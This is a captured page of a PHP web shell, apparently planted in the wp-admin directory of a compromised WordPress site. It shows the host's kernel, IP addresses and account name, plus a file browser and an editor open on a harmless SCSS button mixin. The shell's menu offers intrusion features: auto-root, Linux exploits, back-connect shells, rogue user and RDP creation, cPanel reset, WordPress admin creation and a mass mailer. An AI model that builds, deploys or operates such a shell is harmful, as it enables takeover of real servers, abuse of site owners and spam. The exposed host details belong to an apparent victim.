Linux webm001.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.111.20.1 | : 216.73.216.115
Cant Read [ /etc/named.conf ]
7.4.33
osteocoeek
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
osteocoeek /
osteo-coe.eu /
wp-admin /
css /
colors /
[ HOME SHELL ]
Name
Size
Permission
Action
blue
[ DIR ]
drwx---r-x
coffee
[ DIR ]
drwx---r-x
ectoplasm
[ DIR ]
drwx---r-x
light
[ DIR ]
drwx---r-x
midnight
[ DIR ]
drwx---r-x
ocean
[ DIR ]
drwx---r-x
sunrise
[ DIR ]
drwx---r-x
_admin.scss
11.45
KB
-rw-r--r--
_mixins.scss
1.46
KB
-rw-r--r--
_variables.scss
1.81
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _mixins.scss
/* * Button mixin- creates 3d-ish button effect with correct * highlights/shadows, based on a base color. */ @mixin button( $button-color, $text-color: #fff ) { background: $button-color; border-color: darken( $button-color, 10% ) darken( $button-color, 15% ) darken( $button-color, 15% ); color: $text-color; box-shadow: 0 1px 0 darken( $button-color, 15% ); text-shadow: 0 -1px 1px darken( $button-color, 15% ), 1px 0 1px darken( $button-color, 15% ), 0 1px 1px darken( $button-color, 15% ), -1px 0 1px darken( $button-color, 15% ); &:hover, &:focus { background: lighten( $button-color, 3% ); border-color: darken( $button-color, 15% ); color: $text-color; box-shadow: 0 1px 0 darken( $button-color, 15% ); } &:focus { box-shadow: inset 0 1px 0 darken( $button-color, 10% ), 0 0 2px 1px #33b3db; } &:active, &.active, &.active:focus, &.active:hover { background: darken( $button-color, 10% ); border-color: darken( $button-color, 15% ); box-shadow: inset 0 2px 0 darken( $button-color, 15% ); } &[disabled], &:disabled, &.button-primary-disabled, &.disabled { color: hsl( hue( $button-color ), 10%, 80% ) !important; background: darken( $button-color, 8% ) !important; border-color: darken( $button-color, 15% ) !important; text-shadow: none !important; } &.button-hero { box-shadow: 0 2px 0 darken( $button-color, 15% ) !important; &:active { box-shadow: inset 0 3px 0 darken( $button-color, 15% ) !important; } } }
Close